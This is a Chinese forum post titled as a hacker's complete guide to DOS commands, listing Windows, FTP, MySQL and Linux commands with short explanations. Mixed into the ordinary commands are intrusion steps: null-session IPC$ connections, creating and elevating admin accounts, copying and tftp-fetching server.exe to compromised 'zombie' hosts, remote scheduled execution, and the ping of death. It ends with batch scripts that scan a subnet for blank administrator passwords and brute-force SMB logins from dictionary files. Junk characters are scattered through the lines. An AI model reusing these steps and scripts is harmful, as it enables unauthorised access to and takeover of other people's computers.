黑客基础--最全的DOS命令 黑客基础, 最全的, DOS命令

admin

net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] " " /user:" " 建立IPC空链接 1 n2 ~! F5 c- c- D! l+ ]
net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] "密码" /user:"用户名" 建立IPC非空链接
: j) G+ {5 T7 z! M" m) ]- A& Fnet use h: [url=file://\\ip\c$]\\ip\c$[/url] "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:
8 P/ }. G+ ]: S# ^: A0 u" Bnet use h: [url=file://\\ip\c$]\\ip\c$[/url] 登陆后映射对方C：到本地为H: + W7 Q; n/ ?1 v2 V4 T. h$ z
net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] /del 删除IPC链接   [! G1 c2 }5 S* g
net use h: /del 删除映射对方到本地的为H:的映射
  ^9 W. d% w; ]0 a+ y4 I" n8 Gnet user 用户名　密码　/add 建立用户
# k7 ^3 u4 t3 Z% qnet user guest /active:yes 激活guest用户 2 r0 k9 a/ K1 _8 P: _1 n
net user 查看有哪些用户
  E4 S5 L* Q* wnet user 帐户名 查看帐户的属性
6 E. s. v$ s: w7 \) i' }8 rnet localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数
, d' I  y: L) {( w4 Mnet start 查看开启了哪些服务 4 A" C4 j) t+ A3 j& V
net start 服务名　 开启服务；(如:net start telnet， net start schedule)
9 i" @" T* F% {( V" Gnet stop 服务名 停止某服务 * D0 r2 l3 J4 t9 l/ |' D1 V9 y
net time \\目标ip 查看对方时间
/ N) u0 i0 S! b0 s) g6 \" x) B) nnet time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息 + J' x" h# `: b4 I2 f
net view 查看本地局域网内开启了哪些共享
2 w  w. n, C6 O5 Knet view [url=file://\\ip]\\ip[/url] 查看对方局域网内开启了哪些共享 ( t/ n' `4 y9 U, e3 x
net config 显示系统网络设置
0 \- V% ~& L" c* W! anet logoff 断开连接的共享 8 N. e1 v0 r: F: \% j4 l7 r
net pause 服务名 暂停某服务 $ r& y. ?; U: h8 i
net send ip "文本信息" 向对方发信息
. [% i5 a7 F% m8 k0 F8 Wnet ver 局域网内正在使用的网络连接类型和信息
6 y# R. C3 b- b0 F$ p- knet share 查看本地开启的共享
# U  v. m& l9 |net share ipc$ 开启ipc$共享
( B! W) R8 l6 b* [net share ipc$ /del 删除ipc$共享 - V' ^2 g  z: w
net share c$ /del 删除C：共享 ( ~1 O. O/ q5 F, g7 q4 B( H  R
net user guest 12345 用guest用户登陆后用将密码改为12345 ; U! o, M  u6 w2 c6 V
net password 密码 更改系统登陆密码 , k5 U' {' @9 v& E2 ]
netstat -a 查看开启了哪些端口,常用netstat -an ! ~7 F8 Q% D1 h1 c" a+ B0 n
netstat -n 查看端口的网络连接情况，常用netstat -an ) x; l0 ?7 \  o1 F& i
netstat -v 查看正在进行的工作
- ^* t; p( J6 y4 U4 dnetstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）
  D& x% o+ N, o( |, _+ N: Inetstat -s 查看正在使用的所有协议使用情况
* c% b  T: r3 V) }nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写 % l) W3 ~5 d; b; X: R4 ]/ [
tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。
. @8 @; O8 x- N- G4 ~ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。 : x, p4 [. \8 _
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
2 N6 |! B8 P: i8 cipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息
3 D; {5 J; V$ O6 u8 qtlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内) 2 F& k/ c) Q0 i0 T
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
! i- s% \2 Z0 z. s+ i: |& gdel -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件
3 D; ]* g+ T4 Z7 Ldel /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同）
2 ^+ }6 y2 H7 Z2 Smove 盘符\路径\要移动的文件名　存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖 / Y% u3 c" ]- \6 z, x2 V- H. b. H; _; ^
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，"> "和"> >" 是重定向命令
* g' S' Z3 w8 S$ @/ s: m( j' Gat id号 开启已php?name=%D7%A2%B2%E1"  class="t_tag">注册的某个计划任务 ! X# x; H5 g8 v$ t: u
at /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止
* ]4 W1 o6 ?% f" f3 h  zat id号 /delete 停止某个已注册的计划任务 % s( A" j5 A3 L9 q8 H. M2 ?5 [# q
at 查看所有的计划任务
: ]% M3 a, c+ o, d% i2 ?5 f! r* q( bat [url=file://\\ip]\\ip[/url] time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
! R1 `) {' D9 G; v7 V( ifinger username @host 查看最近有哪些用户登陆 6 W7 Q6 m& t( m* r. P
telnet ip 端口 远和登陆服务器,默认端口为23
! C9 h* j! X% ~8 R  Copen ip 连接到IP（属telnet登陆后的命令） / y% @+ P6 P# L+ ~' I0 S
telnet 在本机上直接键入telnet 将进入本机的telnet 0 |- t. c) H4 C5 p/ X, Q9 Q7 f
copy 路径\文件名1　路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件 ( Z, r; S$ @1 Y4 F; Q* h: @1 }
copy c:\srv.exe [url=file://\\ip\admin$]\\ip\admin$[/url] 复制本地c:\srv.exe到对方的admin下
+ ~" X: S  R1 g: q6 Y0 qcppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件 * N& a+ R) o( `2 Z+ E: d% t
copy [url=file://\\ip\admin$\svv.exe]\\ip\admin$\svv.exe[/url] c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C： : q! k' X  |5 P' A: q
xcopy 要复制的文件或目录树　目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件
, S1 O; C0 W. R. C( x4 s  v) }tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送
" G$ s5 t% K$ g" otftp -i 对方IP　put c:\server.exe 登陆后，上传本地c:\server.exe至主机 3 [  ]( G' Q- c5 v& v! p
ftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时) $ J" ?& H4 z9 t: Z$ |+ l0 z
route print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface
0 t/ U  t0 b8 S/ Z  harp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息
# X: E: d/ ~- v& W, @0 w0 B: ^start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令
3 X# F) k( B8 F3 \4 ]6 j6 ]. A0 Imem 查看cpu使用情况
) j2 R) r6 ^0 G. n* Pattrib 文件名(目录名) 查看某文件（目录）的属性 " V6 j+ G+ o: j  o- _. u
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性
/ k, }( @) y" ]+ odir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间
3 N& X& r) a+ i3 N! jdate /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间
4 D4 R, M" ~: \/ b0 sset 指定环境变量名称=要指派给变量的字符 设置环境变量 & X0 u) e6 y4 L  h9 q, W2 x/ i% v
set 显示当前所有的环境变量
# t9 f9 k- \4 r8 ?set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
4 o* W- ~* T" y% E, rpause 暂停批处理程序，并显示出：请按任意键继续....
, q8 @1 @  P: C) {* Q+ q9 Lif 在批处理程序中执行条件处理（更多说明见if命令及变量） 9 V% U, b; g1 E# C' V
goto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签）
4 C* [! }( G2 L, F+ xcall 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?） ! }2 r0 \4 k- ?# u+ d% E
for 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量） ! ]) S0 L9 a) K6 G
echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置
5 ^) e% w* j9 {$ `echo 信息 在屏幕上显示出信息
( i; p7 J9 l9 S4 k8 a& m  Fecho 信息 >> pass.txt 将"信息"保存到pass.txt文件中
4 f2 v6 y' A" z" c# ofindstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
4 {0 J% k3 a, H1 Bfind 文件名 查找某文件 . i" W  S4 }: z4 U; l
title 标题名字 更改CMD窗口标题名字 - `0 G0 E' B, t5 r* I8 h4 B
color 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
5 r  ^( B& s: d, p& T% h$ Yprompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ ) 6 n  H1 Z" U6 O9 q
print 文件名 打印文本文件
' X, I& X8 d9 Over 在DOS窗口下显示版本信息 ' `: J8 X4 C  \6 R1 G
winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）
1 A1 ^2 q# @0 {/ X) W) H' fformat 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS + G. q' O/ C/ k8 e
md　目录名 创建目录 2 p, u, p: F* I+ `$ S' e" o1 @
replace 源文件　要替换文件的目录 替换文件 9 _& N+ q0 C8 ?! T
ren 原文件名　新文件名 重命名文件名   G; ~9 h, ?+ y' }
tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称 / G7 t, u) X' V2 i1 s% z: r
type 文件名 显示文本文件的内容
, K- O" ~% s/ |! t) y# hmore 文件名 逐屏显示输出文件 , I8 V$ M8 T% S) n
doskey 要锁定的命令＝字符
8 s) x! l7 h, I5 o5 V2 zdoskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir= 7 m. M2 V5 \, L' r, V5 B+ k
taskmgr 调出任务管理器
3 t) w4 m. r, rchkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误 + E% D6 d; l7 ]. Q9 c7 a
tlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口 $ K2 K5 i- {/ f  R+ v4 e
exit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe
& m# q; R8 B. w: o( ?path 路径\可执行文件的文件名 为可执行文件设置一个路径。
: K! ^* ^) X6 R$ I& b) O/ \. [8 gcmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /?
! L. R3 f" |3 |/ o. W1 N4 Pregedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示；
& E2 C4 a& b$ ?0 ~1 k" ^regedit /e 注册表文件名 导出注册表   A" O1 |0 q, y% e2 W
cacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。 6 J' i' s, l7 |% @. L
cacls 文件名 查看文件的访问用户权限列表
' X. J/ Z' d& T# G; U0 x6 y: xREM 文本内容 在批处理文件中添加注解
, l6 x# @4 u! `# lnetsh 查看或更改本地网络配置情况- M, |7 S3 b' V9 u# s
IIS服务命令：! p1 U& `* X. e( G6 s  Y7 O
iisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现）
& x. u: L# ^- ^) \0 {7 eiisreset /start或stop 启动（停止）所有Internet服务 * g; g2 h5 E0 x( M7 A
iisreset /restart 停止然后重新启动所有Internet服务 ' T) ~7 ~7 `' m, e
iisreset /status 显示所有Internet服务状态
# C. b5 }/ B( o7 h8 i  J7 T  uiisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动
% f! _: }1 x! s! z% c7 V4 t7 Riisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机
4 N" t: R" }/ _' biisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务
$ l. k  _2 N( w; L- Siisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。
$ }* n( V3 n7 ?/ \' \FTP 命令： (后面有详细说明内容)
- N1 m+ `# T4 X$ b; G& Pftp的命令行格式为:
0 {, e0 G% ^0 a* bftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。! J' L# u# `" x6 o+ ]
－d 使用调试方式。 $ J( P4 j$ S2 M9 _9 _& X
－n 限制ftp的自动登录,即不使用.netrc文件。* x* z4 |! D  z9 x) y* P8 [; x
－g 取消全局文件名。 ' c+ c' a8 _  N# m5 s, P
help [命令] 或 ？[命令] 查看命令说明
( |: C+ y1 K# m  A- k* C/ Lbye 或 quit 终止主机FTP进程,并退出FTP管理方式.
: P" q9 }1 j5 ~/ q  H9 q" Z( Zpwd 列出当前远端主机目录
# U2 t" @. N: c! W& @; N4 bput 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中 3 r4 W1 c3 {. P, W7 H
get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中
: f$ {. o" L- u/ k$ @9 `0 e5 Jmget [remote-files] 从远端主机接收一批文件至本地主机 % [  O9 Z% B8 S+ o; _2 q
mput local-files 将本地主机中一批文件传送至远端主机
7 K7 X+ @" ]  [& R# Udir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件
' ~$ P5 P% w& L4 r, r' R0 J* Uascii 设定以ASCII方式传送文件(缺省值)   G6 B7 _3 A1 p9 _/ w
bin 或 image 设定以二进制方式传送文件 5 R1 }9 `8 y( r" e5 j9 b. k. E
bell 每完成一次文件传送,报警提示 * C' ~+ k6 B. k$ J6 V! I2 v
cdup 返回上一级目录
% V' ^9 o* r  R1 Q4 \9 {4 L! S, z0 Tclose 中断与远程服务器的ftp会话(与open对应) 3 h1 `8 a0 ?0 b( i/ o6 _
open host[port] 建立指定ftp服务器连接,可指定连接端口
3 O/ Z  h& c" L' n$ A3 fdelete 删除远端主机中的文件 7 n7 K# G; Q  s, P7 u
mdelete [remote-files] 删除一批文件
4 x8 L* e* _+ o9 w' U8 w9 U! }$ Dmkdir directory-name 在远端主机中建立目录 % w3 [' v/ n; Y3 R, O
rename [from] [to] 改变远端主机中的文件名
- o$ L. m! e; p' h) ~' K9 d2 ]rmdir directory-name 删除远端主机中的目录 1 h0 W7 u4 |% Y% }
status 显示当前FTP的状态
) j! |0 a5 T  `+ E$ Q+ ksystem 显示远端主机系统类型 % C+ u" S  p4 M9 L3 m
user user-name [password] [account] 重新以别的用户名登录远端主机
  H  t+ @( |! A: g9 N, p* o8 wopen host [port] 重新建立一个新的连接
( Y9 d8 q. W. wprompt 交互提示模式
( @$ _) D& E/ U0 @7 Y: ]  U9 `macdef 定义宏命令 4 m* [: o0 `. h5 K) s* s  f: F6 V' ?+ u" ?
lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录
) I4 e! a" v9 ^, P# W, schmod 改变远端主机的文件权限 8 |# _! A% ^1 @' O
case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母
5 H( w. e2 g, Q6 @' r& W0 ~2 vcd remote－dir 进入远程主机目录 # x4 G# I9 l2 I& V* T
cdup 进入远程主机目录的父目录
+ @0 U7 @& ^, F# h7 f! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip
7 f) O/ Z9 ]- R* G# G: v. X, V% ZMYSQL 命令： # @) V. y3 H' q
mysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。; A; }" \8 S& {9 b% N0 q; v
（例：mysql -h110.110.110.110 -Uroot -P123456 " q+ [9 f3 a+ E, ?* c
注:u与root可以不用加空格，其它也一样） / w8 @$ u2 v# L2 L
exit 退出MYSQL : }2 H. ?8 v% B: R4 U9 t
mysqladmin -u用户名 -p旧密码 password 新密码 修改密码 3 ?* x% m- E& r& V
grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符）
5 p7 A; r9 u% Y  M6 ]show databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。
" K4 Y6 z6 o9 v# Vuse mysql；0 r+ i+ @0 E' C0 n$ }: F
show tables; 显示库中的数据表 - e* t, Y7 h. |* R
describe 表名; 显示数据表的结构 & K  o0 S% l# X/ B5 h6 u; F
create database 库名; 建库 ) A* ]0 J, v0 T* p
use 库名；
' p% f; x( e  e1 c$ Ccreate table 表名 (字段设定列表)； 建表
2 ^2 D& D7 L$ v1 p9 j) ydrop database 库名;
& C" v7 H: d9 g, r, c# Udrop table 表名； 删库和删表 9 L; x, p: u- Q9 N. a5 Z
delete from 表名; 将表中记录清空
8 m" w) r5 c; N1 Kselect * from 表名; 显示表中的记录   x  O* k) E" }6 @& u6 b7 Z- T
mysqldump --opt school>school.bbb 备份数据库：（命令在DOS的[url=file://\\mysql\\bin]\\mysql\\bin[/url]目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。 9 \' A7 ^! {5 w, |6 h
win2003系统下新增命令（实用部份）： - T# ~$ i3 x3 r
shutdown /参数 关闭或重启本地或远程主机。! m6 b+ f; g! \  S
参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。" i  a/ R- ?5 {
例：shutdown /r /t 0 立即重启本地主机（无延时） ! l* m4 A; x! ?; _; d, N
taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。
3 \9 C+ s* e' \0 ~7 g参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。
! d0 }' \0 U4 Y$ \3 Ztasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。$ ^1 z% ~2 j/ U7 P
参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程  U" o% p7 m/ g0 S
Linux系统下基本命令： 要区分大小写
) W5 N, Z; c* `1 y" Ouname 显示版本信息（同win2K的 ver） / N8 P3 N' w+ k1 I* u. f) U
dir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir） & n, J6 Z" B$ [7 e! [" E
pwd 查询当前所在的目录位置 3 k, Y/ A0 |# l; [+ }/ F7 i4 x
cd cd　..回到上一层目录，注意cd 与..之间有空格。cd　/返回到根目录。
% u* a: f5 B; H! ocat 文件名 查看文件内容 $ d# t  j6 i( K" |) D6 L" I! x! c
cat >abc.txt 往abc.txt文件中写上内容。
+ l6 R" N! F3 Y' d/ q- i# Z8 t+ e- Qmore 文件名 以一页一页的方式显示一个文本文件。 6 |% A+ {. I( d: r* P' i& e
cp 复制文件
9 T1 `" {/ Z( k$ p, X7 Ymv 移动文件 6 L. U6 e* L' X1 z- B' K& z4 ^8 s
rm 文件名 删除文件，rm -a 目录名删除目录及子目录
7 t: X6 ]" _+ V1 Mmkdir 目录名 建立目录 ; v; @, |3 E( t: H
rmdir 删除子目录，目录内没有文档。
0 u, v, F7 J% N+ y# bchmod 设定档案或目录的存取权限
+ {3 d' a, _3 T2 U/ z( V2 U2 ngrep 在档案中查找字符串
; c/ Q4 X0 X& H* h& xdiff 档案文件比较 + I7 O$ U* B# D# |
find 档案搜寻
$ I8 ?9 W# ]3 R! Mdate 现在的日期、时间
) Q5 _# Z1 M8 C+ Q, b! Kwho 查询目前和你使用同一台机器的人以及Login时间地点 ! L& W* w# V% \! L
w 查询目前上机者的详细资料
) S2 l- }  i# k9 S& F8 qwhoami 查看自己的帐号名称 - O$ ]) A3 a3 @2 i: l+ H5 h
groups 查看某人的Group + F4 }% g: a8 D
passwd 更改密码 ; _- Q6 W3 d7 ]" z
history 查看自己下过的命令
6 Y- N0 I7 t' e, b  X" kps 显示进程状态 ; _& O* ^. J- A4 L+ k
kill 停止某进程 " [% i: X, E. w4 |2 |8 \' b5 y
gcc 黑客通常用它来编译C语言写的文件 , Q; Y! G8 D- u2 |- l5 P8 {3 m/ U
su 权限转换为指定使用者
$ w+ `% F  A. }+ D% M8 vtelnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。   ?  n& z% z- x3 i9 O( w# l& g
ftp ftp连接上某服务器（同win2K% F* C  @$ p3 y3 O0 _4 y' X/ ~3 c# H
附：批处理命令与变量
1 z4 a( L. i4 Q# Z$ O' {8 _1：for命令及变量 基本格式：
" m& _( H7 s5 D! }/ p# iFOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数，如：%i ，而指定一个变量则用：%%i ，而调用变量时用：%i% ，变量是区分大小写的（%i 不等于 %I）。; ?- o3 L1 O" b) ^
批处理每次能处理的变量从%0—%9共10个，其中%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的第一个值，同理：%2—%9指输入的第2-9个值；例：net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] pass /user:user 中ip为%1,pass为%2 ,user为%3
& |% g& Y5 K/ I/ \" w; v9 D(set):指定一个或一组文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{“(1 1 254)”第一个"1"指起始值，第二个"1"指增长量，第三个"254"指结束值，即：从1到254；“(1 -1 254)”说明：即从254到1}
: s5 z; ]3 D6 N. Dcommand：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时，命令这间加：& 来隔开
" i1 W" T# ]2 i1 G5 Rcommand_parameters：为特定命令指定参数或命令行开关! ?& w& D  t. K+ \( \# |
IN (set)：指在(set)中取值；DO command ：指执行command- L( W# X& q. A2 ]2 ]: w
参数：/L 指用增量形式{(set)为增量形式时}；/F 指从文件中不断取值，直到取完为止{(set)为文件时，如(d:\pass.txt)时}。 ; A7 B* Y2 O2 G
用法举例： 5 t' x2 J4 q- e3 s$ _4 B3 m! a
@echo off
0 c7 `2 Q$ `# _  J. }( c0 ]- X+ gecho 用法格式：test.bat *.*.* > test.txt ; @! A( A1 ?- F/ }1 H% [
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use [url=file://\\%1.%%G]\\%1.%%G[/url] /user:administrator | find "命令成功完成" >>test.txt : A& |, O- h4 i' z2 T" i* B
存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。5 V& I- H0 e; O6 U$ }9 {
/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认的 %1；%%G 为变量(ip的最后一位）；& 用来隔开echo 和net use 这二个命令；| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为完整的IP地址；(1 1 254) 指起始值，增长量，结止值。
; z, `8 W( q; [- E3 B) K1 d6 m, k@echo off
! G' d) C5 |& }) p+ a! decho 用法格式：ok.bat ip
- n) ?+ F7 z: c# JFOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
$ h7 y' J" {, P( r9 Z0 g- b) v存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。5 M* f; {4 D) ]; r, y7 k, S- Z/ U2 U
2：if命令及变量 基本格式：
3 s' W+ B. E8 q5 O( T  Y& [IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为“真”。
+ T) R: m' [1 N3 W* G, V  y例：IF errorlevel 0 命令 指程序执行后返回的值为0时，就值行后面的命令；IF not errorlevel 1 命令指程序执行最后返回的值不等于1，就执行后面的命令。
0 m" ~) h4 `: w3 f1 K- J$ g: ]0 指发现并成功执行（真）；1 指没有发现、没执行（假）。
7 z  A7 q- k: X( l/ m& SIF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配（即：字符串1 等于 字符串2），就执行后面的命令。) v$ T" j6 m; L% i; a! O
例：“if "%2%"=="4" goto start”指：如果输入的第二个变量为4时，执行后面的命令（注意：调用变量时就%变量名%并加" "） 1 z+ d6 h8 [8 G: T8 ?4 B
IF [not] exist 文件名 命令语句 如果指定的文件名存在，就执行后面的命令。
% A2 Y; |$ n4 b: ]  Y* Q' [# `例：“if not nc.exe goto end”指：如果没有发现nc.exe文件就跳到":end"标签处。
( p* B( ]% d% FIF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上：else 命令语句后指：当前面的条件不成立时，就指行else后面的命令。注意：else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来，因为del命令要单独一行时才能执行，用上< >后就等于是单独一行了；例如：“if exist test.txt. <del test.txt.> else echo test.txt.missing ”，注意命令中的“.”